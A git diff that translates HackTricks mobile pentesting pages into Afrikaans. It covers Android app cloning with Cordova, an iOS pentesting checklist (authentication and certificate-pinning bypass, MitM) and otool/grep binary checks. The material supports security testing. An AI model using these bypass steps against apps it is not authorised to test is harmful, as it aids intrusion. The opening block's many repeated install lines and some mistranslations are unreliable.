install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +$ sudo apt-get install android-sdk-platform-23 -y +$ sudo apt-get install android-sdk-platform-25 -y +$ sudo apt-get install android-sdk-platform-26 -y +$ sudo apt-get install android-sdk-platform-27 -y +$ sudo apt-get install android-sdk-platform-28 -y +$ sudo apt-get install android-sdk-platform-29 -y +$ sudo apt-get install android-sdk-platform-30 -y +$ sudo apt-get install android-sdk-platform-31 -y +``` ```bash cd bank-new cordova requirements ``` - -To build the APK, use the following command: - +Om die APK te bou, gebruik die volgende bevel: ```bash cd bank-new cordova build android — packageType=apk ``` +Hierdie bevel genereer 'n APK met die debug-opsie geaktiveer, wat foutopsporing via Google Chrome vergemaklik. Dit is noodsaaklik om die APK te onderteken voordat dit geïnstalleer word, veral as die toepassing kodeverandering-opsporingsmeganismes bevat. -This command generates an APK with the debug option enabled, facilitating debugging via Google Chrome. It's crucial to sign the APK before installation, especially if the application includes code tampering detection mechanisms. +### Outomatiseringstool -### Automation Tool - -For those seeking to automate the cloning process, **[MobSecco](https://github.com/Anof-cyber/MobSecco)** is a recommended tool. It streamlines the cloning of Android applications, simplifying the steps outlined above. +Vir diegene wat die kloonproses wil outomatiseer, is **[MobSecco](https://github.com/Anof-cyber/MobSecco)** 'n aanbevole hulpmiddel. Dit vereenvoudig die kloon van Android-toepassings deur die stappe hierbo beskryf.
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/mobile-pentesting/ios-pentesting-checklist.md b/mobile-pentesting/ios-pentesting-checklist.md index aac02cfeb..180fe532d 100644 --- a/mobile-pentesting/ios-pentesting-checklist.md +++ b/mobile-pentesting/ios-pentesting-checklist.md @@ -1,133 +1,123 @@ -# iOS Pentesting Checklist +# iOS Pentesting Kontrolelys
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-### Preparation +### Voorbereiding -* [ ] Read [**iOS Basics**](ios-pentesting/ios-basics.md) -* [ ] Prepare your environment reading [**iOS Testing Environment**](ios-pentesting/ios-testing-environment.md) -* [ ] Read all the sections of [**iOS Initial Analysis**](ios-pentesting/#initial-analysis) to learn common actions to pentest an iOS application +* [ ] Lees [**iOS Basics**](ios-pentesting/ios-basics.md) +* [ ] Berei jou omgewing voor deur [**iOS Testing Environment**](ios-pentesting/ios-testing-environment.md) te lees +* [ ] Lees al die afdelings van [**iOS Initial Analysis**](ios-pentesting/#initial-analysis) om algemene aksies te leer om 'n iOS-toepassing te pentest -### Data Storage +### Data Berging -* [ ] [**Plist files**](ios-pentesting/#plist) can be used to store sensitive information. -* [ ] [**Core Data**](ios-pentesting/#core-data) (SQLite database) can store sensitive information. -* [ ] [**YapDatabases**](ios-pentesting/#yapdatabase) (SQLite database) can store sensitive information. -* [ ] [**Firebase**](ios-pentesting/#firebase-real-time-databases) miss-configuration. -* [ ] [**Realm databases**](ios-pentesting/#realm-databases) can store sensitive information. -* [ ] [**Couchbase Lite databases**](ios-pentesting/#couchbase-lite-databases) can store sensitive information. -* [ ] [**Binary cookies**](ios-pentesting/#cookies) can store sensitive information -* [ ] [**Cache data**](ios-pentesting/#cache) can store sensitive information -* [ ] [**Automatic snapshots**](ios-pentesting/#snapshots) can save visual sensitive information -* [ ] [**Keychain**](ios-pentesting/#keychain) is usually used to store sensitive information that can be left when reselling the phone. -* [ ] In summary, just **check for sensitive information saved by the application in the filesystem** +* [ ] [**Plist-lêers**](ios-pentesting/#plist) kan gebruik word om sensitiewe inligting te stoor. +* [ ] [**Core Data**](ios-pentesting/#core-data) (SQLite-databasis) kan sensitiewe inligting stoor. +* [ ] [**YapDatabases**](ios-pentesting/#yapdatabase) (SQLite-databasis) kan sensitiewe inligting stoor. +* [ ] [**Firebase**](ios-pentesting/#firebase-real-time-databases) mis-konfigurasie. +* [ ] [**Realm-databasisse**](ios-pentesting/#realm-databases) kan sensitiewe inligting stoor. +* [ ] [**Couchbase Lite-databasisse**](ios-pentesting/#couchbase-lite-databases) kan sensitiewe inligting stoor. +* [ ] [**Binêre koekies**](ios-pentesting/#cookies) kan sensitiewe inligting stoor +* [ ] [**Cache-data**](ios-pentesting/#cache) kan sensitiewe inligting stoor +* [ ] [**Outomatiese afskakelings**](ios-pentesting/#snapshots) kan visuele sensitiewe inligting stoor +* [ ] [**Sleutelketting**](ios-pentesting/#keychain) word gewoonlik gebruik om sensitiewe inligting te stoor wat agtergelaat kan word wanneer die foon verkoop word. +* [ ] Kortom, **kyk vir sensitiewe inligting wat deur die toepassing in die lêersisteem gestoor word** -### Keyboards +### Sleutelborde -* [ ] Does the application [**allow to use custom keyboards**](ios-pentesting/#custom-keyboards-keyboard-cache)? -* [ ] Check if sensitive information is saved in the [**keyboards cache files**](ios-pentesting/#custom-keyboards-keyboard-cache) +* [ ] Laat die toepassing toe om [**aangepaste sleutelborde te gebruik**](ios-pentesting/#custom-keyboards-keyboard-cache)? +* [ ] Kyk of sensitiewe inligting gestoor word in die [**sleutelborde se kaslêers**](ios-pentesting/#custom-keyboards-keyboard-cache) -### **Logs** +### **Logboeke** -* [ ] Check if [**sensitive information is being logged**](ios-pentesting/#logs) +* [ ] Kyk of [**sensitiewe inligting gelog word**](ios-pentesting/#logs) -### Backups +### Rugsteun -* [ ] [**Backups**](ios-pentesting/#backups) can be used to **access the sensitive information** saved in the file system (check the initial point of this checklist) -* [ ] Also, [**backups**](ios-pentesting/#backups) can be used to **modify some configurations of the application**, then **restore** the backup on the phone, and the as the **modified configuration** is **loaded** some (security) **functionality** may be **bypassed** +* [ ] [**Rugsteun**](ios-pentesting/#backups) kan gebruik word om toegang te verkry tot die sensitiewe inligting wat in die lêersisteem gestoor word (kyk na die aanvanklike punt van hierdie kontrolelys) +* [ ] Verder kan [**rugsteun**](ios-pentesting/#backups) gebruik word om sommige konfigurasies van die toepassing te wysig, dan die rugsteun op die foon te herstel, en as die **gewysigde konfigurasie** gelaai word, kan sekere (sekuriteits)funksionaliteit omseil word -### **Applications Memory** +### **Toepassingsgeheue** -* [ ] Check for sensitive information inside the [**application's memory**](ios-pentesting/#testing-memory-for-sensitive-data) +* [ ] Kyk vir sensitiewe inligting binne die [**toepassingsgeheue**](ios-pentesting/#testing-memory-for-sensitive-data) -### **Broken Cryptography** +### **Gebreekte Kriptografie** -* [ ] Check if yo can find [**passwords used for cryptography**](ios-pentesting/#broken-cryptography) -* [ ] Check for the use of [**deprecated/weak algorithms**](ios-pentesting/#broken-cryptography) to send/store sensitive data -* [ ] [**Hook and monitor cryptography functions**](ios-pentesting/#broken-cryptography) +* [ ] Kyk of jy [**wagwoorde wat vir kriptografie gebruik word**](ios-pentesting/#broken-cryptography) kan vind +* [ ] Kyk vir die gebruik van [**verouderde/swak algoritmes**](ios-pentesting/#broken-cryptography) om sensitiewe data te stuur/stoor +* [ ] [**Haak en monitor kriptografie-funksies**](ios-pentesting/#broken-cryptography) -### **Local Authentication** +### **Lokale Verifikasie** -* [ ] If a [**local authentication**](ios-pentesting/#local-authentication) is used in the application, you should check how the authentication is working. - * [ ] If it's using the [**Local Authentication Framework**](ios-pentesting/#local-authentication-framework) it could be easily bypassed - * [ ] If it's using a [**function that can dynamically bypassed**](ios-pentesting/#local-authentication-using-keychain) you could create a custom frida script +* [ ] As 'n [**lokale verifikasie**](ios-pentesting/#local-authentication) in die toepassing gebruik word, moet jy ondersoek instel hoe die verifikasie werk. +* [ ] As dit die [**Local Authentication Framework**](ios-pentesting/#local-authentication-framework) gebruik, kan dit maklik omseil word +* [ ] As dit 'n [**funksie is wat dinamies omseil kan word**](ios-pentesting/#local-authentication-using-keychain), kan jy 'n aangepaste frida-skrip skep -### Sensitive Functionality Exposure Through IPC +### Sensitiewe Funksionaliteit Blootstelling deur IPC -* [**Custom URI Handlers / Deeplinks / Custom Schemes**](ios-pentesting/#custom-uri-handlers-deeplinks-custom-schemes) - * [ ] Check if the application is **registering any protocol/scheme** - * [ ] Check if the application is **registering to use** any protocol/scheme - * [ ] Check if the application **expects to receive any kind of sensitive information** from the custom scheme that can be **intercepted** by the another application registering the same scheme - * [ ] Check if the application **isn't checking and sanitizing** users input via the custom scheme and some **vulnerability can be exploited** - * [ ] Check if the application **exposes any sensitive action** that can be called from anywhere via the custom scheme -* [**Universal Links**](ios-pentesting/#universal-links) - * [ ] Check if the application is **registering any universal protocol/scheme** - * [ ] Check the `apple-app-site-association` file - * [ ] Check if the application **isn't checking and sanitizing** users input via the custom scheme and some **vulnerability can be exploited** - * [ ] Check if the application **exposes any sensitive action** that can be called from anywhere via the custom scheme +* [**Aangepaste URI Handlers / Deeplinks / Aangepaste Skemas**](ios-pentesting/#custom-uri-handlers-deeplinks-custom-schemes) +* [ ] Kyk of die toepassing **enige protokol/skema registreer** +* [ ] Kyk of die toepassing **registreer om** enige protokol/skema **te gebruik** +* [ ] Kyk of die toepassing **verwag om enige soort sensitiewe inligting** van die aangepaste skema te ontvang wat deur 'n ander toepassing wat dieselfde skema registreer, **onderskep** kan word +* [ ] Kyk of die toepassing **nie gebruikersinvoer via die aangepaste skema nagaan en sanitiseer** nie en of 'n sekere **kwesbaarheid uitgebuit kan word** +* [ ] Kyk of die toepassing **enige sensitiewe aksie blootstel** wat van enige plek via die aangepaste skema geroep kan word +* [**Universele Skakels**](ios-pentesting/#universal-links) +* [ ] Kyk of die toepassing **enige universele protokol/skema registreer** +* [ ] Kyk na die `apple-app-site-association`-lêer +* [ ] Kyk of die toepassing **nie gebruikersinvoer via die aangepaste skema nagaan en sanitiseer** nie en of 'n sekere **kwesbaarheid uitgebuit kan word** +* [ ] Kyk of die toepassing **enige sensitiewe aksie blootstel** wat van enige plek via die aangepaste skema geroep kan word * [**UIActivity Sharing**](ios-pentesting/ios-uiactivity-sharing.md) - * [ ] Check if the application can receive UIActivities and if it's possible to exploit any vulnerability with specially crafted activity +* [ ] Kyk of die toepassing UI-aktiwiteite kan ontvang en of dit moontlik is om enige kwesbaarheid met spesiaal vervaardigde aktiwiteit uit te buit * [**UIPasteboard**](ios-pentesting/ios-uipasteboard.md) - * [ ] Check if the application if **copying anything to the general pasteboard** - * [ ] Check if the application if **using the data from the general pasteboard for anything** - * [ ] Monitor the pasteboard to see if any **sensitive data is copied** -* [**App Extensions**](ios-pentesting/ios-app-extensions.md) - * [ ] Is the application **using any extension**? -* [**WebViews**](ios-pentesting/ios-webviews.md) - * [ ] Check which kind of webviews are being used - * [ ] Check the status of **`javaScriptEnabled`**, **`JavaScriptCanOpenWindowsAutomatically`**, **`hasOnlySecureContent`** - * [ ] Check if the webview can **access local files** with the protocol **file://** **(**`allowFileAccessFromFileURLs`, `allowUniversalAccessFromFileURLs`) - * [ ] Check if Javascript can access **Native** **methods** (`JSContext`, `postMessage`) +* [ ] Kyk of die toepassing enige iets na die algemene knipbord kopie +### Netwerk Kommunikasie -### Network Communication +* [ ] Voer 'n [**MitM-aanval op die kommunikasie**](ios-pentesting/#network-communication) uit en soek na web kwesbaarhede. +* [ ] Kontroleer of die [**hostname van die sertifikaat**](ios-pentesting/#hostname-check) nagegaan word. +* [ ] Kontroleer/Omseil [**Sertifikaat Pinning**](ios-pentesting/#certificate-pinning) -* [ ] Perform a [**MitM to the communication**](ios-pentesting/#network-communication) and search for web vulnerabilities. -* [ ] Check if the [**hostname of the certificate**](ios-pentesting/#hostname-check) is checked -* [ ] Check/Bypass [**Certificate Pinning**](ios-pentesting/#certificate-pinning) +### **Verskeidenhede** -### **Misc** - -* [ ] Check for [**automatic patching/updating**](ios-pentesting/#hot-patching-enforced-updateing) mechanisms -* [ ] Check for [**malicious third party libraries**](ios-pentesting/#third-parties) +* [ ] Kontroleer vir [**outomatiese patching/opdatering**](ios-pentesting/#hot-patching-enforced-updateing) meganismes. +* [ ] Kontroleer vir [**skadelike derde party biblioteke**](ios-pentesting/#third-parties)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiseer werkstrome** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry Vandag Toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/mobile-pentesting/ios-pentesting/README.md b/mobile-pentesting/ios-pentesting/README.md index 4254b40a6..687bbeb39 100644 --- a/mobile-pentesting/ios-pentesting/README.md +++ b/mobile-pentesting/ios-pentesting/README.md @@ -3,221 +3,214 @@
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloei te bou met behulp van die wêreld se mees gevorderde gemeenskaplike gereedskap.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## iOS Basics +## iOS Basiese beginsels {% content-ref url="ios-basics.md" %} [ios-basics.md](ios-basics.md) {% endcontent-ref %} -## Testing Environment +## Toetsomgewing -In this page you can find information about the **iOS simulator**, **emulators** and **jailbreaking:** +Op hierdie bladsy kan jy inligting vind oor die **iOS-simuleerder**, **emulators** en **jailbreaking:** {% content-ref url="ios-testing-environment.md" %} [ios-testing-environment.md](ios-testing-environment.md) {% endcontent-ref %} -## Initial Analysis +## Aanvanklike analise -### Basic iOS Testing Operations +### Basiese iOS-toetsoperasies -During the testing **several operations are going to be suggested** (connect to the device, read/write/upload/download files, use some tools...). Therefore, if you don't know how to perform any of these actions please, **start reading the page**: +Tydens die toetsing sal verskeie operasies voorgestel word (verbind met die toestel, lees/skryf/oplaai/aflaai lêers, gebruik van gereedskap...). As jy dus nie weet hoe om enige van hierdie aksies uit te voer nie, **begin deur die bladsy te lees**: {% content-ref url="basic-ios-testing-operations.md" %} [basic-ios-testing-operations.md](basic-ios-testing-operations.md) {% endcontent-ref %} {% hint style="info" %} -For the following steps **the app should be installed** in the device and should have already obtained the **IPA file** of the application.\ -Read the [Basic iOS Testing Operations](basic-ios-testing-operations.md) page to learn how to do this. +Vir die volgende stappe **moet die toepassing geïnstalleer wees** op die toestel en moet jy reeds die **IPA-lêer** van die toepassing verkry het.\ +Lees die [Basiese iOS-toetsoperasies](basic-ios-testing-operations.md) bladsy om te leer hoe om dit te doen. {% endhint %} -### Basic Static Analysis +### Basiese statiese analise -It's recommended to use the tool [**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF) to perform an automatic Static Analysis to the IPA file. +Dit word aanbeveel om die instrument [**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF) te gebruik om 'n outomatiese statiese analise op die IPA-lêer uit te voer. -Identification of **protections are present in the binary**: +Identifikasie van **beskermings wat teenwoordig is in die binêre lêer**: -* **PIE (Position Independent Executable)**: When enabled, the application loads into a random memory address every-time it launches, making it harder to predict its initial memory address. - - ```bash - otool -hv | grep PIE # It should include the PIE flag - ``` -* **Stack Canaries**: To validate the integrity of the stack, a ‘canary’ value is placed on the stack before calling a function and is validated again once the function ends. - - ```bash - otool -I -v | grep stack_chk # It should include the symbols: stack_chk_guard and stack_chk_fail - ``` -* **ARC (Automatic Reference Counting)**: To prevent common memory corruption flaws - - ```bash - otool -I -v | grep objc_release # It should include the _objc_release symbol - ``` -* **Encrypted Binary**: The binary should be encrypted - - ```bash - otool -arch all -Vl | grep -A5 LC_ENCRYPT # The cryptid should be 1 - ``` - -**Identification of Sensitive/Insecure Funcions** - -* **Weak Hashing Algorithms** - - ```bash - # On the iOS device - otool -Iv | grep -w "_CC_MD5" - otool -Iv | grep -w "_CC_SHA1" - - # On linux - grep -iER "_CC_MD5" - grep -iER "_CC_SHA1" - ``` -* **Insecure Random Functions** - - ```bash - # On the iOS device - otool -Iv | grep -w "_random" - otool -Iv | grep -w "_srand" - otool -Iv | grep -w "_rand" - - # On linux - grep -iER "_random" - grep -iER "_srand" - grep -iER "_rand" - ``` -* **Insecure ‘Malloc’ Function** - - ```bash - # On the iOS device - otool -Iv | grep -w "_malloc" - - # On linux - grep -iER "_malloc" - ``` -* **Insecure and Vulnerable Functions** - - ```bash - # On the iOS device - otool -Iv | grep -w "_gets" - otool -Iv | grep -w "_memcpy" - otool -Iv | grep -w "_strncpy" - otool -Iv | grep -w "_strlen" - otool -Iv | grep -w "_vsnprintf" - otool -Iv | grep -w "_sscanf" - otool -Iv | grep -w "_strtok" - otool -Iv | grep -w "_alloca" - otool -Iv | grep -w "_sprintf" - otool -Iv | grep -w "_printf" - otool -Iv | grep -w "_vsprintf" - - # On linux - grep -R "_gets" - grep -iER "_memcpy" - grep -iER "_strncpy" - grep -iER "_strlen" - grep -iER "_vsnprintf" - grep -iER "_sscanf" - grep -iER "_strtok" - grep -iER "_alloca" - grep -iER "_sprintf" - grep -iER "_printf" - grep -iER "_vsprintf" - ``` - -### Basic Dynamic Analysis - -Check out the dynamic analysis that [**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF) perform. You will need to navigate through the different views and interact with them but it will be hooking several classes on doing other things and will prepare a report once you are done. - -### Listing Installed Apps - -Use the command `frida-ps -Uai` to determine the **bundle identifier** of the installed apps: +* **PIE (Position Independent Executable)**: Wanneer dit geaktiveer is, laai die toepassing in 'n willekeurige geheue-adres elke keer as dit begin, wat dit moeiliker maak om sy aanvanklike geheue-adres te voorspel. +```bash +otool -hv | grep PIE # Dit moet die PIE-vlag insluit +``` +* **Stack Canaries**: Om die integriteit van die stapel te valideer, word 'n 'kanarie'-waarde op die stapel geplaas voordat 'n funksie geroep word en weer gevalideer sodra die funksie eindig. + +```bash +otool -I -v | grep stack_chk # Dit moet die simbole: stack_chk_guard en stack_chk_fail insluit +``` +* **ARC (Automatic Reference Counting)**: Om algemene geheuekorruptie-foute te voorkom + +```bash +otool -I -v | grep objc_release # Dit moet die _objc_release-simbool insluit +``` +* **Versleutelde Binêre**: Die binêre lêer moet versleutel wees + +```bash +otool -arch all -Vl | grep -A5 LC_ENCRYPT # Die cryptid moet 1 wees +``` + +**Identifikasie van Sensitiewe/Onveilige Funksies** + +* **Swak Hashing-algoritmes** + +```bash +# Op die iOS-toestel +otool -Iv | grep -w "_CC_MD5" +otool -Iv | grep -w "_CC_SHA1" + +# Op Linux +grep -iER "_CC_MD5" +grep -iER "_CC_SHA1" +``` +* **Onveilige Willekeurige Funksies** + +```bash +# Op die iOS-toestel +otool -Iv | grep -w "_random" +otool -Iv | grep -w "_srand" +otool -Iv | grep -w "_rand" + +# Op Linux +grep -iER "_random" +grep -iER "_srand" +grep -iER "_rand" +``` +* **Onveilige 'Malloc'-Funksie** + +```bash +# Op die iOS-toestel +otool -Iv | grep -w "_malloc" + +# Op Linux +grep -iER "_malloc" +``` +* **Onveilige en Kwesbare Funksies** + +```bash +# Op die iOS-toestel +otool -Iv | grep -w "_gets" +otool -Iv | grep -w "_memcpy" +otool -Iv | grep -w "_strncpy" +otool -Iv | grep -w "_strlen" +otool -Iv | grep -w "_vsnprintf" +otool -Iv | grep -w "_sscanf" +otool -Iv | grep -w "_strtok" +otool -Iv | grep -w "_alloca" +otool -Iv | grep -w "_sprintf" +otool -Iv | grep -w "_printf" +otool -Iv | grep -w "_vsprintf" + +# Op Linux +grep -R "_gets" +grep -iER "_memcpy" +grep -iER "_strncpy" +grep -iER "_strlen" +grep -iER "_vsnprintf" +grep -iER "_sscanf" +grep -iER "_strtok" +grep -iER "_alloca" +grep -iER "_sprintf" +grep -iER "_printf" +grep -iER "_vsprintf" +``` + +### Basiese Dinamiese Analise + +Kyk na die dinamiese analise wat [**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF) uitvoer. Jy sal deur die verskillende aansigte moet blaai en met hulle moet interaksie hê, maar dit sal verskeie klasse koppel en ander dinge doen en 'n verslag voorberei sodra jy klaar is. + +### Lys van Geïnstalleerde Toepassings + +Gebruik die opdrag `frida-ps -Uai` om 